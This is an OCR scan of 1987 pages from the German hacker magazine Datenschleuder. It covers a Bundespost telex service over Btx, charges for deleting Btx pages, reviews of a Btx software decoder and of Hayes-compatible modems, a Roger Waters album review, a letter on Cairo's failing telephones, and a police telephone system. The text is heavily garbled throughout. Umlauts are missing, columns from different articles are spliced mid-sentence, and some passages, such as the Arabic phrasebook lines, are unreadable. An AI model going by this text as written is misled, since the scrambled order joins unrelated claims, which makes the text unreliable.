Griechisch aus dem Computer. Es sei kein Wunder, das C H R I C ausgerechnet in Mnchen entstanden sei, meint Kstenmacher, " M n c h e n ist ein kleines Silicon Valley, da k o m m e n wir immer an neueste Informationen ran." Wenn der CHRIC-Mitgliederstamm von derzeit etwa 500 Interessenten weiter zunimmt, wird bald eintreten, was sich Pfarrer Kstenmacher von seiner Initiative erhoffte: Ein Netzwerk von christlichen

Mit der Post ins Telex-Chaos

Post nimmt lieber von Anfang volle Gebhren als sich spter bei Einfhrung des Regeldienstes mit den Teilnehmern hemmzuschlagen. Desweiteren mu der Dienst erst durch die Femmeldeordnung anerkannt werden. Im Klartext: Wer als erster neue Dienste nutzt, zahlt auch das Lehrgeld fr die Bundespost und befindet sich juristisch auf sehr glatten Boden.

Telex ber BTX


Telex b e r Bildschirmtext - D a m i t wirbt die Bundespost jetzt verstrkt fr neue Btx-Teilnehmer. Der von der Post fr ein J a h r angelegte Betriebsversuch wurde i m M a i '87 begonnen. BtxTeilnehmer k n n e n versuchen, b e r einen externen Rechner der Bundepost Telexe ins In- u n d Ausland zu versenden u n d auch von dort zu erhalten. Rund 600 Telexe werden zur Zeit tglich von der Post vermittelt. Der C C C stellte umgehend nach Betriebsbeginn die automatische Erstellung und Versendung von Gebhrenbeschwerden auf den Btx-Telex-Dienst um. Vorher wurde dies ber einen Telexserver der GEONET- Mailboxsysteme in England abgewickelt. D a ein Telex als juristisches Dokument anerkannt wird, ist Zuverlssigkeit bei der Abwicklung solcher Server-Dienstleistungen ein wesentliches Kriterium. Dieses kann bei dem Postangebot jedoch noch nicht erwartet werden. So gab die Redaktion am 11.05. gegen 14:41 ein Telex auf. Die Post quittiert die Eingabe mit der Ankndigung, da in wenigen Minuten eine Versand- oder Fehlerbesttigung als Mitteilung bersandt werde. Dies geschah jedoch erst ber 17 Stunden (!) spter. W i e zeit- und gebhrenaufwendige Recherchen ergaben, konnten aufgrund einer Strung i m Datex-P Netz weder Absendebesttigungen fr ordnungsgem zugestellte Telexe, noch Fehlermeldungen fr nicht zugestellte Telexe an die Btx- Teilnehmer quittiert werden. Wesentlich schwerwiegender drfte sich auswirken, da durch denselben Fehler auch keine Mitteilungen ber den Erhalt von Telexen versandt werden konnten. Das bedeutet, da dasTelex gegenberdem Absender als juristisch anerkannt zugestellt gilt, obwohl der betreffende Btx-Teilnehmer keinen Hinweis auf den Telexeingang erhlt. Nach Auskunft der zustndigen Dienststelle knnen weitere Ausflle fr die Zukunft nicht ausgeschlossen werden.

LS23 CLINCHIDS-REDIS.WERNERY! 17.05.87120:4512464 Znirhn

Btx-Nepp
Lschen ist gebhrenpflichtig!
A m heutigen Tage erhielt der C C C nach langen B e m h u n g e n eines der begehrten Exemplare der F e r n m e l d e o r d n u n g (FO). Vielfach ist diese nicht m e h r zu beziehen, da sie im J a n u a r 88 durch die Telekommunikationsordnung ( T K O ) ersetzt wird. Bei genauem Studium der in der FO angegebenen Gebhrenposten fr Bildschirmtext wird erstmals eindeutig klar, da auch das Lschen von Btx-Seiten durch den Anbieter gebhrenpflichtig ist. Angerechnet wird widersinnigerweise die Gebhr fr das Einarbeiten (!) von Btx-Seiten. Das Anbieterhandbuch en thlt zu den B tx-Gebhren nureinen Hinweis auf die im Btx-Systemabrufbaren bersichten. Dort im System sind im Informationsteil (*104ff) fr Anbieter nur die Einarbeitungsgebhren pauschal aufgefhrt, wogegen in der GebhrenUbersicht i m Post-Programm (*20000ff) auf das gebhrenpflichtige Lschen versteckt hingewiesen wird. Die der Redaktion vorliegenden offiziellen Gebhrenbersichten der Bundespost enthalten keinen Hinweis auf die Kosten fr das Lschen von Seiten. Lediglich derim Juni vergangenen Jahres an die Anbieter versandte Umstellungsplan enthlt im Anhang einen entsprechenden Hinweis. Hier zeigt sich mal wieder, mit welch verworrenen (sich teilweise widersprechenden) Informationen die Btx-Anbieter ber die tatschlichen Gebhrenposten genarrt werden.

PX-81a:doku.txt LSI 11 VI 870720/21 CUNCHIDS-REDIGOBUNI21.07.87116:1919139

Computerbesitzern, die ihre Erfahrungen mit dem neuen Medium Computer austauschen. Ethische Bedenken gegen die Einfhrung der elektronischen Datenverarbeitung hat der Computerpfarrer nicht: "Solange der PC Hilfsmittel des Menschen bleibt, sehe ich keinen Grund z u m Warnen".

Computer und Kirche


Luthers Bibel auf Diskette gespeichert

Welche Folgen dadurch womglich bei Termingeschften ausgelst werden, kann sich jeder Anwender selber ausrechnen.

M n c h e n (sz) - D i e L u t h e r - B i b e l a u f Diskette ist eines der " G r o p r o j e k t e " der "Christlichen Interessengemeinschaft f r C o m p u t e r a n w e n d u n g " (CHRIC)

Berechnet werden fr das direkte Lschen von Seiten oder Blttern j e Seite D M 0,10, wogegen das Lschen kompletter Seilen (a-z) sowie das Lschen ab Seite (laut Auskunft der Btx-NV) m i t D M 0,05 j e Seite/Blatt berechnet wird.

9.
Andreas Beulhner

001
D a fragt man sich, warum denn bei so einem "wac-

(Sddeutsche Zeitung,

21.4.1987)

keligen" Betriebsversuch schon die vollen Gebhren verlangt werden. D i e Antwort ist einfach: die

SflfcnMjfcMfccr

Seite 8

Seite 9

^ ^ f j f i c S>nfcnM)Icuber

D i e Erhebung von Gebhren fr das Lschen von Btx-Seiten grenzt nahezu an Betrug. Hinzu kommt, da die Post es bisher nicht fr ntig hielt, in ihren Gebhrenbersichten (auch dem Anbieterhandbuch) auf diesen Umstand hinzuweisen. Denken Sie alsodaran, wenn ihnen die Umgangsformen der Post zum Hals raushngen und ihnen die Lust an der Teilnahme am Btx-Dienst vergangen ist, berlassen Sie das Lschen Ihres Angebotes der Post; das ist preiswerter!

Bildschirmtext, jetzt mit *CHAOS*


Z u m 25./26. Juli '87 nderte die Post die Systemsoftware des Bildschirmtext Rechnerkbels. N e u e Systemmerkmale bringen m e h r k o m f o r t . Entscheiden! drfte das neue Leistungsmerkmal der ' A l p h a n u m e r i s c h e n Suche' sein. So ist es mit * Anbietername,, (Z.B. * C H A O S ) mglich einen Suchaufcrag i m Anbieterverzeichnis zu starten. Folgend wird, bei mehreren Angeboten (z.B. *Club) eine Liste ausgegeben, bei nur einem Anbieter (wer hat sonst noch C H A O S im Namen) das Programm direkt aufgerufen. D i e Btx-Redaktion des C C C lt dementsprechend neue Suchbegriffe in das Anbieterverzeichnis ein-

Stiftung Datentest
Softwaredecoder fuer PCs
Die Datenschleuder hat es schon vor Jahren prophezeit: mittlerweile gibtes eine ganze Reihe von Anbietern, die Softwarelsungen vorweisen fr knBildschirmtext-Anwendungen

Ersatzdarstellung auf dem HerculesScreen, der immerhin die BTX-Auflsung locker schafft. Der Stockem-Decoder bewltigt die Aufgabe ganz gut, bis auf ein gelegentliches unmotiviertes Setzen des Invers-Attributs. Der Verdacht, da dies sogar beabsichtigt ist, drngt sich angesichts der'Regelmigkeit des Fehlers auf, ein Sinn kann jedoch nicht gefunden werden. Da es den meisten Anwendern weniger auf die Grafik, als auf einen sauberen Textaufbau ankommen drfte, kann man dieses Manko getrost vergessen. Als Ausgleich bietet das Programm die Mglichkeit, die dargestellten Seiten sowohl als reine ASCIIDatei, als auch als Grafik abzuspeichern und auszudrucken. Umgekehrt kann man beliebige extern erstellte Texte an das BTX-System senden, der Nachrichtenaustausch wird also auf Techniken erweitert, die man von anderen Medien wie Mailboxen schon kennt und schtzt. Darberhinaus bietet das Programm die Mglichkeit, in einem 'Learn'- Modus festgelegte Befehlsfolgen abzurufen. Man kann so z.B. den Ausdruck seines Kontoslandes automatisieren, wenn man BTX-Kontenfhrung macht. Darberhinaus gibt es noch einigen Schnickschnack, der weniger interessant ist, vielleicht mit Ausnahme der Mglichkeit, resident ins D O S zu gehen, ohne da derBTX-Dialog abgebrochen wird. Leider funktioniert das ganze nicht so weit, da man im D O S einen Text editieren und gleichzeitig den Kontostand abfragen kann, aber solche Probleme lst man ohnehin besser mit entsprechenden Betriebssystemen. Den grten Minuspunkt erhlt das Programm fr den Kopierschutz, der einfach nicht mehr zeitgem ist. Dieser verbirgt sich als Hardwarezusatz in der unvollstndig konfigurierten und viel zu kurzen Serialleitung, die mitgeliefert wird. Das mutet eher rhrend an, denn welche Mglichkeiten gibt es schon, ohne Beeintrchtigung der Funktion am Serialport zu manipulieren, wenn man ohnehin schon einiges verbiegen muss, u m die 1200/75 Baud zu realisieren, und nur eine beschrnkte Zahl von EinAusgabeleitungen hat.

nen. Eines dieser P r o d u k t e nennt sich B T X - T e r m P C u n d w i r d von der F i r m a Stockem C o m p u tertechnik, Lange W e n d e 33, in 4 7 7 0 Soest, angeboten. Fr deutlich unter 300 D M erhlt man einen D I N A5-Ringordner mit der Anleitung und zwei Disketten mit Installations- und Treiberroutinen, sowie dem eigentlichen Softwaredecoder. Auerdem wird ein spezielles, umschaltbares Serialkabel mitgeliefert, das bei 50 % der Kufer Anla zur Erheiterung geben drfte. Dazu spter mehr. Es ist gewi keine leichte Aufgabe, einen Softwaredecoder fr Bildschirmtext zu entwickeln. Dafr sorgt schon der merkwrdige Pseudostandard, den sich die Post fr die langsame bertragung bunter Bildchen hat einfallen lassen. Entsprechend schwer haben sich die Porgrammierer lange Zeit getan. Das Unterfangen wird noch dadurch erschwert, da es zwar einen Industriestandard fr Personalcomputer gibt, dieser aber sptestens dann peinlich wird, wenn

Btx-Red - LS23

PAHHUI
Die Hacker Charts (II)
1 Zero Leander K A N N D E N N H A C K E N S N D E SEIN 2 Freddy Quit E I N SHIFT W I R D K O M M E N 3 Kraftwerk DAS M O D E M 4 Nena 99 T E L E F O N S 5 M a r i a n n e Rosenberg NUI D U ALLEIN 6 Heintje SYSOP SO LIEB 7 Manuela SCHULD W A R NUR DER DATENTRGER 8 Datennetz-Kontrollchor d e r D e u t s c h e n Bundespost HOCH AUF D E M GELBEN HRNCHEN

tragen (femmndlich genehmigt). Neben der Suche nach Abkrzungen wie " C C C B H P C A C I P N bka" erscheint die bersicht des C C C auch bei dem Suchbegriff H I L F E , Nach langen M h e n mit den zustndigen Verwaltungsstellen der Post gelang sogar der Eintrag POST. Schon i m Schlagwortverzeichnis war der C C C unter dem Begriff P O S T zu finden. Auch zuknftigerscheintderName des Clubs neben denen der Postdienststellen. Ein sichtbares Zeichen der Ausgewogenheit i m Bildschirmtextsystem.

LS23

eben die bunten BTX-Bildchen dargestellt werden sollen. Stockem hat, nach anfnglichen Schwierigkeiten, den Groteil dieser Probleme gelst. BTX-Term P C untersttzt alle gngigen Grafikkarten und holt heraus, was herauszuholen ist. Unser Testrechner war ein Billigst-PC, made in Eile, mit Hercules-Graftk und V20-Chip. Dadurch waren die Probleme vorprogrammiert. U m den Test noch weiter zu erschweren, wurde ein Postmodem D 1200S-06 benutzt, dadamit die grten Schwierigkeiten im praktischen Betrieb garantiert sind. Alternativ wurde ein Datenfhn S21/23D bereitgehalten, da klar war, da es m i t einem Postmodem so einfach nicht gehen wrde. W i e unschwer zu ahnen ist, haben wir schluendlich auch letzteren benutzt. Es kam uns zunchst darauf

art wo?
U n d w o bitteschn ist die Kunst? Eben nicht auf der Dokumenta, und eben auch nicht in den vielgerhmten 120 weissen q m Bus von -Dt. Schade. rgerlich aber: W a s treibt den C C C in die Niederungen der Kasperltheater-Wirklichkeit einer Dokumenta? D I E Wirklichkeit braucht -Dt, u m ihre Kunst als "Nase im W i n d " und "Zukunftstechnologie" erscheinen zu lassen; aber was macht ein echtes Hackerteam in I H R ? Darber demnchst mehr, was ich an dieser Stelle auch nur angekndigt haben wollte, und verabschiede mich fr heute, nach China.

9 Geier Absturz
DIE INTERDATIONALE A Peter A l e x a n d e r HIER C R A C K T EIN MENSCH

gobiin btxter22.ds 19870630 2200


PS: Ein Hinweis nach Redaktionsschlu: Commodore will zur IFA 10.000 BTX-Steckmodule (Innenleben von Siemens) fr unter 400 D M anbieten. Das sagte Commodore allerdings auch schon auf der letzten I F A . ( j f f ^ f e r i c Sfetcitfitylciibcr

Marina

Kern

an, zu erfahren, wie die Software mit B T X umgeht und was man fr Vorteile hat, wenn man sie statt eines TV-Decoders einsetzt. Beim Testrechner war Farbe nicht drin, umsomehr galt das Augenmerk der

LS

blofeld
SaicnSrl/Iciibcr

Marina bringt uns ein chinesisches Telefonbuch aus Peking mit; A n m . d . R e d

^ g f ^ j p i c

Seite 10

Seite 11

To DF or not to DF
Von einem der a u s z o g ein H a y e s - M o d e m z u kaufen. Unser N o r m a l u s e r M . U m p i t z ( N a m e von d e r Redaktion gendert) begab sich also a u f die Suche nach einem schnelleren M o d e m , u m die K o sten pro ausgelesenem Byte zu senken. D a d e r Computer dieses H e r r n keine F Z Z - N r . hat u n d daher die Post dort keines ihrer 1200BpSModems anschliet, brachte den H e r r n a u f die Idee, sich ein H a y e s - k o m p a k t i b l e s M o d e m z u zulegen. U m das Ende der Geschichte gleich vorweg zu nehmen: Keines der getesteten M o d e m s war ohne Macken. Nicht ein einziges hat sich komplett an diesen sogenannten Hayes-Standart gehalten. Erklrung fr Neulinge: Ein Hayes-Modem wird normalerweise direkt an die RS232-Schnittstelle angeschlossen. Es gibt auch PC-Karten, die die RS232 mit ersetzen. A l l e Komandos bis auf eines fangen mit einem grogeschriebenen " A T ' an. Sie starten also ihr Terminalprogramm, stellen es auf die gewnschte Baudrate ein, und knnen nun ihre K o m a n d o s eingeben. (Einige Modems haben auf der Platine ein paar Schalter, die mssen vorher noch eingestellt werden). M a n unterscheidet den Komando-Modus, in dem Befehle eingegeben werden knnen und den

das M o d e m noini;.

. x x zuni Keset bringen kann,

wird komplett ignoriert u.s.w.

Baud soviel Kohle zu verlangen. Wenn schon illegal denn schon richtig.

Modem: WELCOM Generalvertrieb: Nicht auszumachen Wertung: Unter Umstnden brauchbar Besonderheiten: Wenige DlP-Switshes Begrndung: Hngt sich manchmal aus unerklrlichen Grnden mitten whrend der bertragung auf. Hngt sich auf, wenn whrend der Komandoeingabe ein A n r u f erkannt wird. Benutzt zur Baudratenerkennung bei einem Anruf einen 600 Carrier, auf den manche M o d e m s nicht antworten, und schickt auch keinen 21 OOHz-Ton vorweg. D i e ersten beiden Fehler sollen durch ein neues Eprom beseitigt seien (Hndler treten!). Was mit den anderen ist. Modem: LIGHTSPEED 1200 Generalvertrieb: M.PJ., Aachen Wertung: Bestes Modem im Test Besonderheiten: Scheisse Billig Begrndung: Bis jetzt nureine Macke bei dem neuen Eprom, das derzeit ausgeliefert wird. Das Alle sollten sie wegwerfen (wiedermal krftig den Hndler treten). Bei dem Neuen wird kein Carrier erkannt, wenn man das Busy-Signal abfragt ( " A T X 3 " ) und die Mailbox keinen 2100Hz-Ton sendet. Wenn man das weglt: ganz prima. W i r d bei Dauerbetrieb ein wenig zu warm. Hat fr Begriffsstutzige noch eine Kurzanleitung, die das Modem an die Schnittstelle bertrgt (nette Spielerei). Sendet bei Anruferkennung zuerst einen 21 OOHz-Ton und schaltet dann i m m e r zwischen 300- und 1200-Baud Carrier um, also ganz korrekt. Modem: GVC 1200 Resco, Augsburg

Modem: PC Link Generalvertrieb: GVM, Dsseldorf Wertung: Unter Umstnden brauchbar Besonderheiten: Modembox. fr MDB 200-3,teuer aber das sind die Modemboxen alle, FZZ-Zulassung Begrndung: Keine Spaces zwischen den Komandos erlaubt. Kein Hardware-Handshake bei 1200/75 Baud. daher Pufferberlauf mglich. Reagiert im Hayesmodus bei der Anruferkennung allergisch auf gewisse Koppler (Epson z.B.). D i e Login-Meldung kommt deshalb nur verstmmelt an. Sonst keine Probleme. Der Dealer wollte uns auch erst nicht glauben, aber wir haben ihn eines Besseren belehrt.
Wir fordern endlich anstndige Hayes-

Diese verkrzte Darstellung macht deutlich, da hier gleich ein halbes Dutzend interessanter Themen verschenkt wurden. Musikalisch zwischen 'Dark Side of the M o o n ' , 'When the W i n d blows' und anderen Endzeit-Dramen angesiedelt, verpasst Waters die Gelegenheit, sich kritisch mit den neuen Technologien und ihren Auswirkungen auseinanderzusetzen. Erschreckenderweise bleibt die Platte hrbar, was fr die Qualitten des Musikers Waters spricht, dem der Dramaturg Waters das Wasser nicht reichen kann. M a n kann sich des Gefhls nicht erwehren, da hier versucht wurde, nachzuholen, was seit zehn Jahren versumt worden ist. Fairlight, Emulator, Synclavier, Wave Generator und wie sie alle heissen, die Superstar-Aggregate der 80er Jahre, eingesetzt von Leuten, die nichts Besseres damit anzufangen wissen, als ' M i a m i Vice' in Tne zu setzen, sind nur Symptone fr eine Geisteshaltung unter den Musikschaffenden, die im Wesentlichen den kommerziellen Aspekt sehen, wenigerden knstlerischen. W o m i t die notwendige Brcke geschlagen wre, zu der Frage, was der Quatsch in der DATENS C H L E U D E R zu suchen hat: Dem geneigten (ca. 72 Grad) Leser wird nicht entgangen sein, da hier Parallelen zu dem Artikel 'Art wer ?' in DATENS C H L E U D E R 19 gezogen werden knnen. Wenn Kunst & Computer fr uns ein Thema ist, dann Musik & Computer erst recht. W i r werden uns knftig etwas mehr damit beschftigen. Und gerade das erwhnte Produkt aus der Stimmungsfabrik Waters ist idealer Ansatzpunkt frdie Frage: ' W i e konnte es soweit kommen ?' Dazu in spteren Ausgaben mehr. Klappe, Schnitt, und ab ins Kopierwerk.

Modems!! W i r fordern hiermit jeden Herstellerauf, der was auf sich hlt, uns so ein D i n g mal fr eine Woche zu leihen, damit wir es testen knnen. W i r sind zu erreichen in der IUS-Mailbox 0203/596245, an "Hackowiz", oder per Snailmail an Postlagerkarte:056945 B , 4100 Duisburg 1

Hackowiz CL1NCH/SYSOPIGAST/06.07.87/19:28/5621

Online-Modus, wrend das Modem die Verbindung


jnit einem anderen hat. Die Hayes-Modems haben den Vorteil, da das Eingeben der Komandos ber Schnittstelle geschieht. Man braucht also nicht gezielt irgendwelche Pin's an der Schnittstelle zu setzen, um auch gezielt whlen zu knnen.

Radio K.A.O.S.
W i e m a n Perlen vor die S u e wirft

Generalvertrieb: wird Besonderheiten:

Wertung: Viel zu teuer fr die Leistung die gebracht keine

" T h i s is K . A . O . S . . Y o u a n d I are listening to K A O S in Los Angeles. Let's go to the telephone now and take a request." So beginnt das neueste Epos von Roger Waters, dem M a n n , der dafr sorgte, da Pink Floyd hart am Mainstream vorbei zur Kultband wurde und den experimentellen Exzessen von Sid Barret & Co Grenzen setzte. DerPlotist schnell nacherzhlt: Der autistische Protagonist gelangt in den Besitz eines drahtlosen Telefons, das er zusammen mit seinem Bruder aus dem eingeschlagenen Schaufenster des Electronic-Shops geklaut hat und erschliesst sich damit das globale Dorf, knpft Kontakte zu Computern in aller Welt und spielt sein eigenes StarWars, nicht ohne vorher dafr gesorgt zu haben, da nichts passieren kann. Seine Aktion wird zum Auslser fr die Menschheit, dem atomaren Wahnsinn ein Ende zu setzen.

Modem: WD-1600c Generalvertrieb: PIM Computer AG, Schweiz Wertung: Vom Kauf abzuraten Besonderheiten: Telephonhrer wird mitgeliefert Begrndung: Alles scheitert am Terminal-EscapeCharacter. Bei einem normalen Hayes-Modem m u erst eine gewisse Zeit gewartet werden, dann gibt man ihm dreimal ein "wartet wieder" und ist im Komandomodus (ohne aufgelegt zu haben). Dieses Modem hat das nicht ntig. Sofort, wenn dieser Character bertragen wird, legt es auf und ist im Komandomodus. W e n n sie " A T S 2 = 2 5 5 " sagen, um die bertragung transparent zu schalten, kann das D i n g nach dem Whlen den Carrier nicht mehr erkennen. Binrdateien knnen also mit diesem Modem nicht bertragen werden. Auch eine anstndige Carrier-Erkennung i m Autoanswer-Modus bringt das D i n g n i c h t zustande. Der DTR-Pin, mit dem man Sn/ciiSitjiciiHcr

Begrndung: Schwierigkeiten mit der Anruferkennung. Die Firma liefert, obwohl sie zur Cebit schon ein neues Eprom hatte, zweieinhalb Monate danach immer noch Modems mit dem alten Eprom aus. 2100Hz vorweg fehlt. Ansonsten gut zu gebrauchen.

gobiin CLINCH/DATENSCHLEUD SYSOP/03.07.87/23:36/2416

ER -REDI Zeichen

Modem: GVC 300 Generalvertrieb: Besonderheiten: Resco, Augsburg maximal Wertung: Von Kauf abzuraten

Nur 300 Baud

Begrndung: Scheint die Eigenheit zu haben, fters kaputt zu gehen (Drei Stck in einem Monat ist wohl nicht mehr normal!). Kann nur 300 Baud. Wenn whrend das M o d e m einen A n r u f erkannt hat und er den 2100Hz sendet - ein Carrier anliegt, erkennt das M o d e m diesen nicht. Also immer erst nach dem 2100Hz-Ton senden. berhaupt ein Witz, fr 300

Seite 1 2

Seite 13

Snfciidjlcubcr

Das Globale Dorf

Ctbraurhjaaueiiurig tief /Jciidichvn Periiiprc(hit!lin in gypten ^ j ' j " j . >-'i J 1 i i } , taii'it lllli1'. ni'i lit.tcleton't L-l-<;iimuiiH'j.jtt fi niutlr I. Kille Mnze zu 1 l'luatrr in di-ii iMliliiz
>li'.k.-M f J J- j j ULS hutl

Ein Brief aus Kairo


Liebe F r e u n d e , als ich unlngst von A t h e n nach K a i r o flog, sa ein japanischer Geschftsmann neben m i r . W i e sich i m Gesprch herausstellte, vertritt er in der gyptischen H a u p t s t a d t ein j a panisches Unternehmen. A u f die Frage, was er in A t h e n gemacht habe u n d wie lange er dort gewesen sei, antwortete er: " I c h w a r n u r f r ein p a a r Stunden da, u m m i t m e i n e r F r a u und meiner F i r m a in J a p a n zu telefonieren. K a i r o ist nmlich die Stadt der toten Telefone." Von Kairo ins Ausland zu telefonieren ist in der Tat so gut wie unmglich. W e r es trotzdem versucht, bekommt v o m Frulein v o m A m t die Auskunft, da die Wartezeit zwei bis drei Tage betrgt. Meist wartet m a n jedoch vergeblich. In Kairo wird schon der Versuch, von einem Nilufer ans andere zu telefonieren, zur Geduldsprobe. Kairo ist zwar mit fast zehn Millionen Einwohnern die grte S tadt Afrikas, es gibt aber nur etwa 80.000 Telefonanschlsse. Das behauptet zumindest das zustndige Ministerium fr Kommunikation. W i e viele von den vorhandenen Anschlssen tatschlich funktionieren, wei allerdings kein Mensch zu sagen. A n Apparaten herrscht offenbar kein Mangel. In Geschften, B r o s u n d komfortablen Wohnungen befindet sich fast i m m e r ein hliches schwarzes Telefon. W e n n m a n danach fragt, ob man es mal kurz bentzen drfe, dann erhlt man fast immer die Antwort: " I m M o m e n t geht es leider nicht". Was die liebenswrdigen gypter als M o m e n t bezeichnen, das kann in Wirklichkeit eine Zeitspanne von Wochen, Monaten oder Jahren sein. A l s ich in Kairo einmal auf Wohnungssuche ging, machte i c h ' j e m M a k l e r von A n f a n g an klar, da ich als Journalist a u f ein Telefon angewiesen sei. Das sah er auch ein. A l s w i r tagelang von ihm ausgekundschaftete W o h n u n g e n besichtigten, strzte ich m i c h i m m e r sofort auf das Telefon, das - wie versprochen - auch vorhanden war. D i e Hlfte der ausprobierten Apparate war jedoch tot. " D a s kann nur einen M o m e n t dauern", versuchte der Makler zu trsten - ein schwacher Trost. ^ ^ r S i e SnicnSdjIcubcr

l,i-"*i'niili Y l-ebu'rttL & 2. licii ftim'r ubiidiiiu'ii uuil diu |jl-mUii,,<-IiIo Nuuiiuer Ilten c i^JI j j j j jLi. ohudd o-iiaiii.|n' a oji'lfl'i.w.jfir cn in'mru (jl-matltt'b J. Subuld der Tciliietmier umwertet, auf doli Knopf drilokoii j j L k^il JUi J / L J / w biimiga'r-md ma jiru'dd 'alek el-muUlia'lliiu i'dyat 'a-si'rr -S. Wenn die |t-v. Uastiilc Nuiiiiiiit beseUl 1=1, doli ffiirer wiedtr uuilojjvii und doli Knopf drckt-1>. ftlo Mnze fiit von soilisl lirruus j j i U i l j ^U j <il_JI t i l ^ l - i ^ J l ^ f j l 1 in k'nit on.ni'mra ( 4 1, <JL~JI h : f inaaeliY'fa.tiutte.Oam.mi'Sifi niahal-lc'iitt ii'dYat W i'rr ti''at el-Vnil min iiafc'liu

gelegentlich in solchen Schchten zu schaffen machen, scheinen zu wissen, wie dieser Drahtverhau zusammengehrt. Diese Techniker sind brigens in Kairo uerst gefrchtet. W e n n siees nmlich schaffen, einen gestrten Anschlu instand zu setzen, dann legen sie bei dieser Arbeit zehn andere lahm. " W e n n sie wieder anrcken, dann sind schon hundert Telefone tot", erklrt ein Kairoer Telefonbesitzer, dessen Apparat noch funktioniert.

Das bruchstckhafte Fernsprechnetz hat nur eine~i gute Seite. M a n hat immer eine glaubhafte Ausrede zur Hand, wenn man Leuten aus dem W e g gehen will, und die Abschiedsfloskel " W i r rufen uns in den nchsten Tagen an" ist nicht ernst gemeint. Herzlichst Ihr W . Stockklausner

(aus: Frankfurter Rundschau,

135.78)

T o d k a m m i t d e m Telefon AFP, Kairo Aus Freude darber, da er nach 15 Jahren endlich den beantragten Tele^ fonanschlu erhalten sollte, ist ein 50 Jahre alter gypter am Samstag an einem Herzschlag gestorben. Die Kaiv roer Presse berichtete, der Musiker Adel Atteya Mostafa sei beim (Jntery schreiben des Anschluformulars pltzlich tot zusammengebrochen. D i e Kairoer Telefonmisere kostet Nerven und nicht zuletzt Zeit. In Geschften, Bros und Banken verbringen die Angestellten manchmal Stunden damit, eine einzige Nummer anzurufen. Sie sitzen vor dem Telefon, blicken vertrumt aus dem Fenster und warten auf den erlsenden Summton, dereine freie Leitung verspricht. Andere trommeln ununterbrochen wtend auf den Apparat und glauben, dasie damit mehr erreichen. Hat man als Kairoer Telefonbentzer endlich ein Freizeichen erhalten, dann beginnt eigentlich erst der richtige Nervenkitzel. N u n mu sich nmlich herausstellen, o b der Apparat des Teilnehmers funktioniert, den man erreichen will. Vielleicht ist er auch besetzt oder es meldet sich ein anderer Teilnehmer, weil der Anschlu bei einer Reparatur vertauscht wurde. Nach meinen Erfahrungen spielt sich der Versuch, in Kairo jemanden telefonisch zu erreichen, so ab: Ich whle die Nummer zwanzig mal. Dazu brauche ich zwei Stunden, weil das Freizeichen auf sich warten lt. Bei zehn Wehlversuchen tut sich nichts, bei sieben anderen ertnt das Besetztzeichen. Dreimal meldet sich ein falscher Teilnehmer. Ich gebe auf, setze mich ins Taxi und fahre durch den chaotischen Kairoer Verkehr zu meinem Gesprchspartner.

Hicom im bundesdeutschen Polizeinetz


Wie die SIEMENS Pressestelle mitteilt wurde jetzt im Landesnetz der Polizei BadenWrtemberg im Polizeirevier Knzelsau das erste Kommunikationssystem Hicom als Endvermittlungsstelle im Fernsprechortsnetz der Polizei in Betrieb genommen. Drei weitere Hicom-Systeme fr die Polizeireviere in Geislingen, Kirchheim und FellJbach gehen in Krze in Betrieb.
Alle vier Anlagen stattet Siemems mit einem Gebhrencomputer zur Gesprchsdatenerfassung und -auswertung aus. Privatgesprche werden nach der W a h l einer Kennzahl gesondert erfat und abgerechnet. Das v o m ffentlichen Nachrichtenverkehr unabhngige Fernsprechsondernetz der Polizei in der Bundesrepublik Deutschland dient vor allem der polizeiinternen Nachrichtenbertragung zwischen den Polizeien der Lnder, dem Bundeskriminalamt, dem Bundesgrenzschutz sowie den Behreden, Diensstellen und Beamten (!) des Bundes und der Lnder, die mit Polizeiaufgaben betraut sind. Die Landesnetze dieses Sondernetzes gliedern sich jeweils in Vierdraht-Knotenvermittlungen und Nebenstellenanlagen als Endvermittlungen. sind Diese ber Endvermittlungs-Nebenstellenanlagen

Das Kairoer Telefonnetz wurde vor dem zweiten Weltkrieg von einer britischen Firma gelegt. Seither geschah so gut wie nichts mehr. D i e Leitungen wurden nie mehr berprft, instand gesetzt oder gar erneuert. Das W o r t Instandhaltung ist den gyptern vllig unbekannt. Dies trifft brigens nicht nur auf Telefone zu, sondern auch auf Aufzge, Autos und andere technische Anlagen. Solange sie funktionieren, sind die gypter glcklich und zufrieden. W e n n sie kaputtgegangen sind, dann war es ein bser Streich Allahs, der mit ein paar krftigen Hammerschlgen oder einem Stck Klebestreifen behoben wird. Im Ministerium oder beim Kairoer Fernmeldeamt scheint jedenfalls nie jemand dran gedacht zu haben, da die Telefonleitungen aus billigem Vorkriegsmaterial i m Laufe der Jahrzehnte mrbe und erneuerungsbedrftig werden knnten. Manche behaupten sogar, da inzwischen niemand mehr wei, wo die Kabel liegen. Fest steht jedenfalls, da viele Leitungen in Abwsserkanle abgesackt sind und unbrauchbar wurden. Andere sind von Ratten und Musen im Kairoer Untergrund angenagt und stillgelegt worden. Auch wenn man von Telefontechnik nichts versteht, dann sagt einem ein Blick in einen Kairoer Kabelschacht - die dazugehrdenden Eisen- oder Betondeckel sind lngst gestohlen worden - alles, worber man sich oft gewundert hat. Er ist fast immer mit Abwssern und Abfllen voll. Dazwischen befindet sich eine bunte Vielfalt von dnnen Drhten. Nicht einmal die Techniker des Telegrafenamtes, die sich

Querverbindungen an eine Knotenvermittlung und ber Amtsleitungen an das ffentliche Fernsprechnetz angeschlossen.

Viele gyptische und auslndische Firmen verzichten inzwischen auf die Dienste des Telefons. Sie beschftigen Boten, die schriftliche Nachrichten berbringen und mit der Antwort zurckkommen. Damit sie nicht im Verkehrsgewhl so leicht steckenbleiben, werden sie m i t Fahrrdern oder Mopeds losgeschickt. Wer vom 20. bis 27. Oktober '87 zur Weltausstellung des Fernmeldewesens der T E L E C O M in G e n f reist, kann sich dort ber den neuesten Stand der ISDN-Technik, nicht nur von Siemens, informieren.

LS23
( ^ f f ^ r p i c Snlcudjicukcr

Seite 14

Seite 15

Real Programmers PASCAL

don't

use
T e i l III

